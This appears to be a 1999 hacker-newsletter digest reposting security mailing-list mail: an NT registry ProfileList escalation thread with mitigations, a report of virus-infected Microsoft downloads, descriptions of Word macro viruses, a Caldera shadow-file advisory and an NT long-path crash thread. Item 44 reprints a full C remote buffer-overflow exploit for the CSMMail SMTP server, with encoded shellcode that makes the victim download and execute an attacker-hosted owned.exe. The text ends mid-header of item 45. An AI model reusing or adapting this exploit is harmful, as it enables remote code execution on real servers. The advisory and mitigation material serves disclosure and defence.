> user of the system could change another user's
> ProfileImagePath and get it to load a different profile (eg
> c:\trojaned-profile) that contains entries in the Start Up
> folder that will run when that user next logs on to that system.
If we're going to start worrying about this one, this is just one of many
modifications that need to be made. The best collection of resources in
this area remains (IMHO) Steve Sutton's NSA paper at www.trustedsystems.com
> Editing these Registry keys can be done local or from across
> the network.
This is only true of the server. A currently patched workstation requires
admin access to open this portion of the registry across the network.
However, to actually _trojan_ someone, you also must have the ability to
insert new profiles under %systemroot%\Profiles, which is typically NOT
available on a server. A good solution for a server would be to make the
permissions on the parent key admins, system, and server ops. If the group
of users who you expect to be logging on at the console of a server were
more diverse, then I would recommend creating a group for just that purpose
and setting the permissions to admins, system, and the group you
established.
So unless you're worried about a workstation with serial users, it turns out
that the complete requirements to really carry out an attack are seldom met.
> Once they have logged onto the domain they use reg.exe to
> open the Administrator's ProfileList key. This is easily
> found as it is the SID with a RID of 500. They then edit the
> ProfileImagePath to point to \\DODGY\C$\profile .
I would suggest that you actually try your scenarios. I have tried this,
and it doesn't work. The admin will get the profile for the default user.
The same is true if you try to point the profile anywhere else than
%systemroot%profiles.
> Resolution: The winlogon.exe process actually creates the new
> subkey when a user logs on - and the key is _not_ created in
> the security context of the user currently logging on but
> rather the SYSTEM account. Only the SYSTEM account, then,
> needs write access to the ProfileList key and Everyone else
> should be given only Read Access. Doing this will not prevent
> new users from logging on and they "SID" subkey is still created.
I recommended doing this some months ago. It is still not completely clear
that this won't break something somewhere. As always, people should try
this in their own systems and be sure something doesn't break. Another way
to go at this one would be to put an app or script in the default user's
startup group that would set the permissions to admins, system and that
user. I believe supercacls (also from Steve Sutton) could be used to do
this.
-------------------------------------------------------------------------------------------
Date: Thu, 29 Apr 1999 12:31:21 -0700
From: Paul Leach <paulle@MICROSOFT.COM>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: NT Security Advisory: Domain user to Domain Admin - Profiles and the Registry
> -----Original Message-----
> From: dan koons [mailto:dkoons@secured.net]
> Sent: Thursday, April 29, 1999 11:52 AM
> To: Paul Leach
> Cc: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
> Subject: Re: NT Security Advisory: Domain user to Domain Admin -
> Profiles and the Registry
>
> strange. i just followed your explicit instructions, grabbed
> the first
> file that turned up (which was called "securing windows nt
> installation"
> and was dated october 23, 1997) and searched it for the string
> 'ProfileList' and was unable to find any matches.
Here's a relevant section of the text, cut and paste from the doc:
<quote>
Protecting the Registry
In addition to the considerations for standard security, the administrator
of a high-security installation might want to set protections on certain
keys in the registry.
By default, protections are set on the various components of the registry
that allow work to be done while providing standard-level security. For
high-level security, you might want to assign access rights to specific
registry keys. This should be done with caution, because programs that the
users require to do their jobs often need to access certain keys on the
users' behalf. For more information, see Chapter 24, "Registry Editor and
Registry Administration."
For each of the keys listed below, make the following change:
Access allowed
Everyone Group QueryValue, Enumerate Subkeys, Notify and Read Control
In the HKEY_LOCAL_MACHINE on Local Machine dialog:
\Software
This change is recommended. It locks the system in terms of who can
install software.
Note that it is not recommended that the entire subtree be locked
using this setting
because that can render certain software unusable.
\Software\Microsoft\RPC (and its subkeys)
This locks the RPC services.
\Software\Microsoft\Windows NT\ CurrentVersion
\Software\Microsoft\Windows NT\ CurrentVersion\Profile List
\Software\Microsoft\Windows NT\ CurrentVersion\AeDebug
\Software\Microsoft\Windows NT\ CurrentVersion\Compatibility
<end quote>
So it appears that there's a space in the spelling in the document. In the
registry, there's no space. I'll report the bug.
Perhaps all the clones of the document you cited also copied the spelling
error :-)
Paul
-------------------------------------------------------------------------------------------
Date: Thu, 29 Apr 1999 12:00:56 -0700
From: dan koons <dkoons@SECURED.NET>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: NT Security Advisory: Domain user to Domain Admin - Profiles and the Registry
On Thu, 29 Apr 1999, dan koons wrote:
> further, in the "windows nt security guidelines" developed for nsa
> research (found at http://www.trustedsystems.com/NSAGuide.htm), the united
> states department of energy's "windows nt security advisor" (at
> http://doe-is.llnl.gov/SecRes/CustomTools/secadvisor.pdf), the united
> states navy's "navy secure windows nt 4.0 installation and configuration
> guide" (at http://infosec.navy.mil/COMPUSEC/ntsecure.html), and the
> "hardening of windows nt 4.0" (at
> http://pw2.netcom.com/~honeyluv/index.html), a search for the string
> 'ProfileList' also does not yield any results.
oops; my mistake. the navy guide DOES recommend setting the 'ProfileList'
key to 'read' for 'Authenticated Users'. but i could not find any
reference to the key in any of the other documents.
dan
_____________________________________________________________________
daniel e koons dkoons@secured.net
_____________________________________________________________________
-------------------------------------------------------------------------------------------
Date: Thu, 29 Apr 1999 13:35:36 -0700
From: Paul Leach <paulle@MICROSOFT.COM>
To: BUGTRAQ@netspace.org
Subject: Re: NT Security Advisory: Domain user to Domain Admin - Profiles and the Registry
-----Original Message-----
>From: Mnemonix [mailto:mnemonix@GLOBALNET.CO.UK]
Sent: Wednesday, April 28, 1999 12:37 PM
To: BUGTRAQ@NETSPACE.ORG
Subject: NT Security Advisory: Domain user to Domain Admin - Profiles and
the Registry
Problem : NT users can cause other users of the system to load a "trojaned"
profile that could lead to a system compromise. This issue has been here for
as long as NT 4 has, but I'm not sure if anybody has picked this particular
issue up.
Details: When a user logs onto an NT Workstation or Server a new subkey is
written to the HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
registry key. The name of this new key is that of the user's Security
Identifier or SID. One of the values of this key is the ProfileImagePath
which points to the location of the user's profile directory. This can
reference a local path (eg %systemroot%\profiles\acc_name) or a UNC path (eg
\\PDC\profiles\acc_name).
This is indeed an issue. It is documented in the "Securing Windows NT"
whitepaper,
http://www.microsoft.com/NTServer/security/exec/overview/Secure_NTInstall.as
p
<http://www.microsoft.com/NTServer/security/exec/overview/Secure_NTInstall.a
sp>
and anyone who has implemented those recommendations will be safe against
this vulnerability.
(NB: The registry key is misspelled "Profile List" in the document.)
Also, the SCE templates in SP4/SP5 included one designed to help automate
the recommendatiaons in the whitepaper -- securws4.inf, IIRC. However, we
just examined it and it allows "Power Users" (abbreviated "PU") to write the
key. It'll be fixed in SP6. In the meantime, one can hand edit the entry for
ProfileList in the template. Find the line that looks like this:
"MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\ProfileList",2,"D:P(A;CI;GR;;;AU)(A;CI;GA;;;DA)(A;CI;GA;;;
SY)(A;CI;GA;;;CO)(A;CI;GRGW;;;PU)"
and get rid of the "(A;CI;GRGW;;;PU)" at the end.
Paul
-------------------------------------------------------------------------------------------
Date: Thu, 29 Apr 1999 13:53:05 -0700
From: Paul Leach <paulle@MICROSOFT.COM>
To: BUGTRAQ@netspace.org
Subject: Security Configuration Editor info
Since I said that SCE could be used to fix the ProfileList bug that Mnemonix
reported, I got a private request asking where more information about SCE
(Security Configuration Editor) could be found -- they'd tried the usual
places.
I think they changed the name since SP4 to "Security Configuration Manager",
but I called it SCE becaue most people know it by the old name, since that's
what it was called in SP4. I did a search on that exact phrase at
www.microsoft.com and got a lot of hits, the first one was
http://www.microsoft.com/NTServer/security/techdetails/prodarch/securconfig.
asp
<http://www.microsoft.com/NTServer/security/techdetails/prodarch/securconfig
.asp>
which looks pretty good. In general, a good place to look for security info
on MS products is
http://www.microsoft.com/security/Resources/whitepapers.as
<http://www.microsoft.com/security/Resources/whitepapers.asp> p
Paul
@HWA
40.0 Microsoft is a virus, oh sorry I mean new microsoft virus problem...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml
microsoft.virus.txt - Microsoft yet again releases virus infected MS Word
documents on their own web site! If you have visited
http://www.microsoft.com/uk/business_technology/dns/ecommerce/financial/case.htm
recently to find out more about MS Exchange and E-commerce, then you should scan
for the W97M/Marker.C virus on your network. This has happened numerous times, and
Microsoft STILL cannot manage to check documents for
viruses before releasing them on their web site. Thanks a fucking lot, Microsoft!
Date: Sun, 25 Apr 1999 13:13:34 +0100
>From: T Bruce Tober <octobersdad@reporters.net>
Subject: You'd think they'd know better...
...or maybe not. I mean, it is Microcrap we're talking about here, viz this
article from Woody's (Woody's Office Watch), and if there's anyone more
pro-Microsoft it's only Bill G himself,:
(Read the complete story http://www.wopr.com/ )
TRUST NO ONE [...]
Microsoft has in the past released virus infected documents on their web
site and by other means. WOW has had to publish warnings several times.
Sadly it's happened again. Anyone visiting
http://www.microsoft.com/uk/business_technology/dns/ecommerce/financial/case.htm
to find out more about MS Exchange and E-commerce got more than they
bargained for when they downloaded any of the case study documents. All
were infected with W97M/Marker.C virus! Apparently no-one at Microsoft
checked the documents before making them publicly available [...]
Bruce Tober, <octobersdad@reporters.net>, <http://www.crecon.demon.co.uk>
Birmingham, UK, EU +44-121-242-3832 soon at <http://www.star-dot-star.co.uk>
RISKS-LIST: Risks-Forum Digest Weds 28 April 1999 Volume 20 : Issue 34
@HWA
41.0 Some new viruses from http://www.wopr.com/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
DMV, Hot, FormatC, Wiederoffnen
DMV
DMV is probably the first Word macro virus to have been written. It is test virus, written by a person called Joel McNamara
to study the behavior of macro viruses. As such, it is no threat - it announces its presence in the system, and keeps the user
informed of its actions.
McNamara wrote DMV in the fall of 1994 - at the same time, he published a detailed study about macro viruses. He kept
his test virus under wraps until a real macro virus, Concept, was discovered. At that time, he decided to make DMV known
to the public. We can expect to see new variants of the DMV virus, as well as totally new viruses inspired by the techniques
used in this virus. McNamara also published a skeleton for a virus to infect Microsoft Excel spreadsheet files.
Hot
Hot was the first Word macro virus written in Russia. It was found in the wild over there in January 1996.
It spreads in a similar manner as the Concept virus: when an infected DOC is first opened, the virus modifies the
NORMAL.DOT file, and will spread to other documents after that. Unlike the earlier Word macro viruses, Hot does not
replicate with the File/Save As command - it infects only during the basic File/Save command. This means that Hot will infect
only existing documents in the system - not new ones.
Infected documents contain the following four macros, which are visible in the macro list:
AutoOpen
DrawBringInFrOut
InsertPBreak
ToolsRepaginate
When Hot infects NORMAL.DOT, it renames these macros to:
StartOfDoc
AutoOpen
InsertPageBreak
FileSave
Macros are saved with the 'execute-only' feature, which means that a user can't view or edit them.
Hot contains a counter. It adds a line like this to the WINWORD6.INI file:
QLHot=35112
This number is based on the number of days in this century. Hot adds 14 to this number and then waits until this latency time
of 14 days has passed. Hot will spread normally during this time, it will just not activate.
After the 14 day pause, there is a 1 in 7 chance that a document will be erased when it is opened. The Virus will delete all
text and re-save the document. Hot does not do this, if it find a file called EGA5.CPI from the C:\DOS directory. A
comment in the source code of the virus hints that this feature is added so that the author of the virus and his friends can
protect themselves from the activation damage:
'---------------------------------------------------------------
'- Main danger section: if TodayNo=(QLHotDateNo + RndDateNo) ---
'- and if File C:DOSega5.cpi not exist (not for OUR friends) -
'---------------------------------------------------------------
By default, there is no file by the name EGA5.CPI in MS-DOS distributions.
Hot was the first macro virus to use external functions. This system allows Word macros to call any standard Windows API
call. The use of external functions specific to Windows 3.1x means that Hot will be unable to spread under Word for
Macintosh or Word 7 for Windows 95: opening an infected document will just produce an error message.
FormatC
This is not a virus, but a trojan because it does not replicate. It does, however, format your C: drive as soon as the document
is opened. This trojan was posted to a Usenet newsgroup.
Wiederoffnen
Wiederoffnen is not a virus, but a Word macro trojan. It comes in a Microsoft Word 2 document but works perfectly under
Word 6 too. Wiederoffnen intercepts the AutoClose macro and when the document is closed plays tricks with
AUTOEXEC.BAT.
@HWA
42.0 Caldera COAS may leave shadowed password file readable...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Tue, 27 Apr 1999 20:26:16 -0600
From: synapse <syn@TOXYGENE.MADSCIENCE.NU>
To: BUGTRAQ@netspace.org
Subject: Caldera Advisory
Heya Aleph,
Not sure if this had come accross the list.
-----BEGIN PGP SIGNED MESSAGE-----
______________________________________________________________________________
Caldera Systems, Inc. Security Advisory
Subject: COAS
Advisory number: CSSA-1999:009.0
Issue date: 1999 04 27
Cross reference:
______________________________________________________________________________
1. Problem Description
/etc/shadow may get world readable
2. Vulnerable Versions
Systems: OpenLinux 2.2.
Packages: previous to coas-1.0-8
3. Solutions
The proper solution is to upgrade to the coas-1.0-8 package.
If /etc/shadow is world-readable, this is fixed with
chmod 600 /etc/shadow
4. Location of Fixed Packages
The upgrade packages can be found on Caldera's FTP site at:
ftp://ftp.calderasystems.com/pub/OpenLinux/updates/2.2/current/RPMS/
The corresponding source code package can be found at:
ftp://ftp.calderaystems.com/pub/OpenLinux/updates/2.2/current/SRPMS
5. Installing Fixed Packages
Upgrade the affected packages with the following commands:
rpm -q coas && rpm -U coas-1.0-8.i386.rpm
6. Verification
The MD5 checksums (from the "md5sum" command) for these packages are:
1efa8cde40f5684293e03c2499f2f59f README
b3fa473f6ba574052991bf2254bd378d RPMS/coas-1.0-8.i386.rpm
3bfa00aa3230f97537e8baa2c0454d08 SRPMS/coas-1.0-8.src.rpm
7. References
This and other Caldera security resources are located at:
http://www.calderasystems.com/news/security/index.html
Additional documentation on this problem can be found in:
This security fix closes Caldera's internal Problem Report 4544.
8. Disclaimer
Caldera Systems, Inc. is not responsible for the misuse of any of the
information we provide on this website and/or through our security
advisories. Our advisories are a service to our customers intended to
promote secure installation and use of Caldera OpenLinux.
______________________________________________________________________________
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv
iQCVAwUBNyW4/+n+9R4958LpAQHntgP/cHhIOaKUPRfeBOtMQP7lZ2NQlEPrqzkq
cu/Q9IvIqrvm/mFikznaMTdehz0Jql2NuY2Zjs0MUdF0Rm7KsgBQ6BYX+10GAE2W
HAZIuYQ2zeM2acGcrvzGYExkKmrLOfhD77V9l7rZ9WieQO7B8vmj5N4nGdkUNz2U
j+AigG8FJNI=
=O2I/
-----END PGP SIGNATURE-----
@HWA
43.0 NT4+SP4 filename length vulnerabilty
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Bug in WinNT 4.0 SP4
Alvaro Gilabert (agilabert@RIBA.ES)
Mon, 19 Apr 1999 15:15:36 +-200
Hi,
I supose it is a bug and I will explain why do I think so
You can exceed the limit in the number of chars allowed in a filename.
WinNT does allow it. You can move a folder to a deeper one exceeding it.
But, when you try to backup that folder, the backup program (BackupExec
and WinNT Backup) crashes and reboots the server. If you try to backup
thru a network drive (using another server and mapping that folder), then
it crashes and reboot the server also. Not the server that is making the
backup but the server that has the wrong folder. That's a but because WinNT,
supposing to be a fileserver, should take care of this. Recently, Mindspring
released a report comparing WinNT vs. RedHat, sponsored by Microsoft. This
point was missed in the comparison.
Alvaro Gilabert
ICQ UIN 2316344
-----------------------------------------------------------------
Re: Bug in WinNT 4.0 SP4
David LeBlanc (dleblanc@MINDSPRING.COM)
Tue, 20 Apr 1999 07:12:23 -0700
At 03:15 PM 4/19/99 +-200, Alvaro Gilabert wrote:
>Hi,
>I supose it is a bug and I will explain why do I think so
>You can exceed the limit in the number of chars allowed in a filename.
WinNT does allow it. You can move a folder to a deeper one exceeding it.
That's because the limit isn't where you think it is. From the
documentation on CreateFile in the SDK:
Windows NT: You can use paths longer than MAX_PATH characters by calling
the wide (W) version of CreateFile and prepending \\?\ to the path. The
\\?\ tells the function to turn off path parsing. This lets you use paths
that are nearly 32,000 Unicode characters long. You must use
fully-qualified paths with this technique. This also works with UNC names.
The \\?\ is ignored as part of the path. For example,
\\?\C:\myworld\private is seen as C:\myworld\private, and
\\?\UNC\tom_1\hotstuff\coolapps is seen as \\tom_1\hotstuff\coolapps.
===============================
So it seems that if you use the APIs properly, you can deal with extremely
long paths. When you move things around, it is very likely that you are
dealing with relative names, not absolute names.
David LeBlanc
dleblanc@mindspring.com
-----------------------------------------------------------------
Re: Bug in WinNT 4.0 SP4
Paul Gracy (paul.gracy@COMPGEN.COM)
Mon, 26 Apr 1999 16:36:11 -0400
I must disagree. Any action that a program takes that can crash a server is
a bug. Period.
The fact that properly using the SDK and following all the 'rules of
microsoft' would prevent the crash is not an excuse. When the application
tries to do something that would cause a crash, the OS should whack the
offender's knuckles (see Dr. Watson), not curl up and die.
I am tired of bad code being given excuses. If MS wants to run large,
mission-critical / business-critical systems, they should fix their code.
IMHO.
=========================
Paul H. Gracy
paul.gracy@compgen.com
phone: 404 705 2873
#include <std.disclaimer>
=========================
> -----Original Message-----
> From: David LeBlanc [SMTP:dleblanc@MINDSPRING.COM]
> Sent: Tuesday, April 20, 1999 10:12 AM
> To: BUGTRAQ@netspace.org
> Subject: Re: Bug in WinNT 4.0 SP4
>
> At 03:15 PM 4/19/99 +-200, Alvaro Gilabert wrote:
> >Hi,
> >I supose it is a bug and I will explain why do I think so
> >You can exceed the limit in the number of chars allowed in a filename.
> WinNT does allow it. You can move a folder to a deeper one exceeding it.
>
> That's because the limit isn't where you think it is. From the
> documentation on CreateFile in the SDK:
>
> Windows NT: You can use paths longer than MAX_PATH characters by calling
> the wide (W) version of CreateFile and prepending "\\?\" to the path. The
> "\\?\" tells the function to turn off path parsing. This lets you use
> paths
> that are nearly 32,000 Unicode characters long. You must use
> fully-qualified paths with this technique. This also works with UNC names.
> The "\\?\" is ignored as part of the path. For example,
> "\\?\C:\myworld\private" is seen as "C:\myworld\private", and
> "\\?\UNC\tom_1\hotstuff\coolapps" is seen as "\\tom_1\hotstuff\coolapps".
> ===============================
>
> So it seems that if you use the APIs properly, you can deal with extremely
> long paths. When you move things around, it is very likely that you are
> dealing with relative names, not absolute names.
>
>
> David LeBlanc
> dleblanc@mindspring.com
-----------------------------------------------------------------
Re: Bug in WinNT 4.0 SP4
David LeBlanc (dleblanc@MINDSPRING.COM)
Tue, 27 Apr 1999 13:13:54 -0700
At 04:36 PM 4/26/99 -0400, Paul Gracy wrote:
>I must disagree. Any action that a program takes that can crash a server is
>a bug. Period.
I did not say it wasn't a bug. A bug, by definition, is something that
causes an application (or even the whole OS) to crash or otherwise
malfunction. So you are not disagreeing with anything I _said_. If you
can make something go splat, then it is a bug. No arguments there.
>The fact that properly using the SDK and following all the 'rules of
>microsoft' would prevent the crash is not an excuse.
No excuses were being made. Please do not manufacture excuses when they
are not present.
The only point was that Alvaro seemed to think that it was a problem that
moving a folder could result in a total path which is > MAX_PATH. So far
as I know, this isn't a problem, since if you are correctly handling the
open, you can deal with extremely long paths. I thought that others might
have the same sort of issue, and also thought that few people would know
that bit of arcane trivia, so I was trying to point out how you might deal
with this correctly. In general, using API calls correctly, and knowing
various bits of trivia from the documentation is a Good Thing, and perhaps
might save others from having their app go down.
I was NOT saying that crashing is not a bug. That would be ridiculous.
Neither the little backup app that comes with NT, or the Seagate product
(which as far as I know, both sprung from Arcada, which Seagate bought) are
favorites of mine. And before anyone asks, I really don't have something I
can recommend.
David LeBlanc
dleblanc@mindspring.com
-----------------------------------------------------------------
Date: Tue, 27 Apr 1999 21:03:52 +0200
From: tschweikle@FIDUCIA.DE
To: BUGTRAQ@netspace.org
Subject: Antwort: Re: Bug in WinNT 4.0 SP4
David LeBlanc wrote:
>At 03:15 PM 4/19/99 +-200, Alvaro Gilabert wrote:
>>Hi,
>>I supose it is a bug and I will explain why do I think so
>>You can exceed the limit in the number of chars allowed in a filename.
>WinNT does allow it. You can move a folder to a deeper one exceeding it.
>
>That's because the limit isn't where you think it is. From the
>documentation on CreateFile in the SDK:
>
>Windows NT: You can use paths longer than MAX_PATH characters by calling
>the wide (W) version of CreateFile and prepending *\\?\* to the path. The
>*\\?\* tells the function to turn off path parsing. This lets you use paths
>that are nearly 32,000 Unicode characters long. You must use
>fully-qualified paths with this technique. This also works with UNC names.
>The *\\?\* is ignored as part of the path. For example,
>*\\?\C:\myworld\private* is seen as *C:\myworld\private*, and
>*\\?\UNC\tom_1\hotstuff\coolapps* is seen as *\\tom_1\hotstuff\coolapps*.
>===============================
>
>So it seems that if you use the APIs properly, you can deal with extremely
>long paths. When you move things around, it is very likely that you are
>dealing with relative names, not absolute names.
>
>
>David LeBlanc
>dleblanc@mindspring.com
While following this tread I tried it out. View seconds later my NT server
rebooted.
Trying to create a 'reboot-server-path' from a client - impossible. Seems as if
such path must be created from server console. But what about a carefully
designed program installabel on the server, using the wide variant to create
directories - creating paths exceeding MAX_PATH then setting a share to such a
program?
WinNT crashes within this scenario, every time a client wants to access this
share.
One simpler scenario: install a service. Exceed MAX_PATH. Start this service at
system startup - watch the server rebooting.
THIS IS A BUG - No excuse.
---
Thomas Schweikle <tschweikle@fiducia.de>
@HWA
44.0 CSMMail Windows SMTP Server Remote Buffer Overflow Exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Tue, 27 Apr 1999 13:44:51 -0400
From: pw <pw@NACS.NET>
To: BUGTRAQ@netspace.org
Subject: CSMMail Windows SMTP Server Remote Buffer Overflow Exploit
CSMMail is a SMTP server for win95/98/NT with features that
include at least five stack overflows. At least two of these allow remote
execution of arbitrary code.
The first the overflow is found in the HELO command, there is also
an overflow in the MAIL FROM: command, however, I have been unable to get
either of these to return to an arbitrary address.
The next overflow I found was in the VRFY command, when a long string is
used as an argument ("VRFY aaaaaaa....") one can overwrite the return
address and force the server to return to arbitrary code. This is the
overflow the following exploit takes advantage of.
There is also another buffer overflow in the VRFY command which
happens if one enters "VRFY aaaa@aaaaaaa......" I have not been able to
make this return to an arbitrary address.
The RCPT TO: command also has a overflow in it that can be used to
return to arbitrary code.
There are two main problems which are run into when exploiting the
first hole in the VRFY command. The first one is trivial to get around.
If a "@" sign (40h) is found on the buffer being copied and the buffer is
excessively long it will not overflow the buffer. To get around this we
just make sure 40h is not in our code or offseted addresses.
The next problem stems from the fact that CSM Mail has no DLL's of
it's own which are loaded in its address space and it's Image Base is
00400000h. Since we will have to include a null to address to any of
CSMMail's code there is no sure way to return to our code. To get around
this I have included multiple return addresses in the exploit which are
bound directly to the operating system version which CSM Mail is running
under.
It is also worth noting that two of the arguments for
the function which is having it's return address overwritten need to be
fixed up with a valid read memory location in order to bypass page faults.
The exploit that is included below will force CSMMail to connect
to a specified web server and download, save and execute a file from it.
The exploit should work under x86 unix's and x86 versions of win32. By
default it is set to be compiled under unix, to compile it under win32
take out the "#define UNIX." I would like to thank Acpizer for
porting this to win32 and determining the SP3 address values.
I do not know of any bugfixes for this and this exploit
works on the current version which is being distributed from their
site. (It did the last time I checked it)
-mcp
<--------------------------CUT HERE------------------------->
#define UNIX
#ifndef UNIX
#include <stdio.h>
#include <fcntl.h>
#include <winsock.h>
#include <io.h>
#define CLOSE _close
#define SLEEP Sleep
#else
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#define CLOSE close
#define SLEEP sleep
#endif
/*
CSMMail Exploit by _mcp_ <pw@nacs.net>
Win32 port and sp3 address's by Acpizer <acpizer@unseen.org>
Greets go out to the following people: Morpheus, Sizban, Rocket,
Acpizer, Killspree, Ftz, Dregvant, Vio, Symbiont, Coolg, Henk, #finite
and #win32asm.
You can contact me by e-mail or on efnet.
As always no greets go out to etl
*/
const unsigned long FIXUP1 = 264;
const unsigned long FIXUP2 = 268;
const unsigned long OFFSET = 260;
char code[] =
"\xEB\x53\xEB\x20\x5B\xFC\x33\xC9\xB1\x82\x8B\xF3\x80\x2B\x1"
"\x43\xE2\xFA\x8B\xFB\xE8\xE9\xFF\xFF\xFF\xE8\xE4\xFF\xFF\xFF"
"\xEB\x37\x46\x58\xFF\xE0\x33\xDB\xB3\x48\xC1\xE3\x10\x66\xBB"
"\x94\x62\x56\xFF\x13\x8B\xE8\x46\x33\xC0\x3A\x6\x75\xF9\x46"
"\x83\xC0\x1\x3A\x6\x74\xDD\x56\x55\x33\xDB\xB3\x48\xC1\xE3"
"\x10\x66\xBB\xB8\x62\xFF\x13\xAB\xEB\xDF\xEB\x4F\x33\xC9\x66"
"\x49\xC1\xC1\x2\x51\x33\xC0\x51\x50\xFF\x57\xE8\x8B\xE8\x33"
"\xC9\x51\x51\x51\x51\x57\xFF\x57\xF4\x33\xC9\x51\x51\x51\x51"
"\x56\x50\xFF\x57\xF8\x59\x57\x51\x55\x50\xFF\x57\xFC\x83\xC6"
"\x7\x33\xC9\x51\x56\xFF\x57\xDC\xFF\x37\x55\x50\x8B\xE8\xFF"
"\x57\xE0\x55\xFF\x57\xE4\x33\xC9\x51\x56\xFF\x57\xEC\xFF\x57"
"\xF0\xE8\x59\xFF\xFF\xFF\x4C\x46\x53\x4F\x46\x4D\x34\x33\x1"
"\x60\x6D\x64\x73\x66\x62\x75\x1\x60\x6D\x78\x73\x6A\x75\x66"
"\x1\x60\x6D\x64\x6D\x70\x74\x66\x1\x48\x6D\x70\x63\x62\x6D"
"\x42\x6D\x6D\x70\x64\x1\x58\x6A\x6F\x46\x79\x66\x64\x1\x46"
"\x79\x6A\x75\x51\x73\x70\x64\x66\x74\x74\x1\x2\x58\x4A\x4F"
"\x4A\x4F\x46\x55\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50\x71"
"\x66\x6F\x42\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50\x71\x66"
"\x6F\x56\x73\x6D\x42\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x53"
"\x66\x62\x65\x47\x6A\x6D\x66\x1\x2\x69\x75\x75\x71\x3B\x30"
"\x30\x00";
/*This is the encrypted /~pw/owned.exe we paste at the end */
char dir[] =
"\x30\x7f\x71\x78\x30\x70\x78\x6f\x66\x65\x2F\x66\x79\x66\x1\x0";
unsigned int getip(char *hostname)
{
struct hostent *hostinfo;
unsigned int binip;
hostinfo = gethostbyname(hostname);
if(!hostinfo)
{
printf("cant find: %s\n",hostname);
exit(0);
}
#ifndef UNIX
memcpy((char *)&binip, hostinfo -> h_addr, hostinfo -> h_length);
#else
bcopy(hostinfo -> h_addr, (char *)&binip, hostinfo -> h_length);
#endif
return(binip);
}
int usages(char *fname)
{
printf("CSMMail Remote Buffer Overflow exploit v1.1 by _mcp_ <pw@nacs.net>.\n");
printf("Win32 porting and nt sp3 address's by Acpizer <acpizer@unseen.org>\n");
printf("Usages: \n");
printf("%s <target host> <www site> <fixup address> <return address>\n", fname);
printf("win98 SP1:\n");
printf(" <fixup address> = 0xBFF78030\n");
printf(" <return address> = 0xBFF79243\n");
printf("NT SP3:\n");
printf(" <fixup address> = 0x77EB14C0\n");
printf(" <return address> = 0x77E53FC7\n");
printf("NT SP4:\n");
printf(" <fixup address> = 0x77EB14C0\n");
printf(" <return address> = 0x77E9A3A4\n");
printf("Will make <target host> running CSMMail download, save, and\n");
printf("execute http://<www site>/~pw/owned.exe\n");
exit(0);
}
main (int argc, char *argv[])
{
int sock,targethost,sinlen;
struct sockaddr_in sin;
static unsigned char buffer[20000];
unsigned char *ptr,*ptr2;
unsigned long ret_addr;
int len,x = 1;
unsigned long rw_mem;
#ifndef UNIX
WORD wVersionRequested;
WSADATA wsaData;
int err;
wVersionRequested = MAKEWORD( 2, 2 );
err = WSAStartup( wVersionRequested, &wsaData );
if (err != 0) exit(1);
#endif
if (argc < 5) usages(argv[0]);
targethost = getip(argv[1]);
len = strlen(argv[2]);
if (len > 60)
{
printf("Bad http format!\n");
usages(argv[0]);
}
ptr = argv[2];
while (x <= len)
{
x++;
(*ptr)++; /*Encrypt the http ip for later parsing */
ptr++;
}
if( (sscanf(argv[3],"0x%x",(unsigned long *) &rw_mem)) == 0)
{
printf("Input Error, the fixup memory address has incorrect format\n");
exit(0);
}
if( (sscanf(argv[4],"0x%x",(unsigned long *) &ret_addr)) == 0)
{
printf("Input error, the return address has incorrect format\n");
exit(0);
}
sock = socket(AF_INET,SOCK_STREAM,0);
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = targethost;
sin.sin_port = htons(25);
sinlen = sizeof(sin);
printf("Starting to create the egg\n");
ptr = (char *)&buffer;
strcpy(ptr,"VRFY ");
ptr+=5;
memset((void *)ptr, 0x90, 7000);
ptr2=ptr;
ptr2+=FIXUP1;
memcpy((void *) ptr2,(void *) &rw_mem,4);
ptr2=ptr;
ptr2+=FIXUP2;
memcpy((void *) ptr2,(void *) &rw_mem,4);
ptr+=OFFSET;
memcpy ((void *) ptr,(void *)&ret_addr, 4);
ptr+=60;
memcpy((void *) ptr,(void *)&code,strlen(code));
(char *) ptr2 = strstr(ptr,"\xb1");
if (ptr2 == NULL)
{
printf("Bad shell code\n");
exit(0);
}
ptr2++;
(*ptr2)+= len + ( sizeof(dir) - 1 );
(char *) ptr2 = strstr(ptr,"\x83\xc6");
if (ptr2 == NULL)
{
printf("Bad shell code\n");
exit(0);
}
ptr2+= 2;
(*ptr2)+= len + 8;
ptr+=strlen(code);
memcpy((void *) ptr, (void *) argv[2], len); /*Parse in the http
site's info */
ptr+=len;
memcpy((void *) ptr,(void*) &dir, sizeof(dir) );
printf("Made the egg\n");
if ( connect(sock, (struct sockaddr *)&sin, sinlen) == -1)
{
perror("error:");
exit(0);
}
printf("Connected.\n");
#ifndef UNIX
send(sock, "HELO lamer.com\r\n",16, 0);
send(sock, (char *)&buffer, strlen((char *)&buffer), 0);
send(sock,"\r\n",2,0);
#else
write(sock, "HELO lamer.com\r\n",16);
write(sock, &buffer, strlen((char *)&buffer) ); /* strlen((char
*)&buffer */
write(sock,"\r\n",2);
#endif
SLEEP(1);
printf("Sent the egg\n");
#ifndef UNIX
WSACleanup();
#endif
CLOSE(sock);
exit(1);
}
@HWA
45.0 HP Sendmail 8.8.6 DoS
~~~~~~~~~~~~~~~~~~~~~
Date: Mon, 26 Apr 1999 14:46:41 -0700 (PDT)
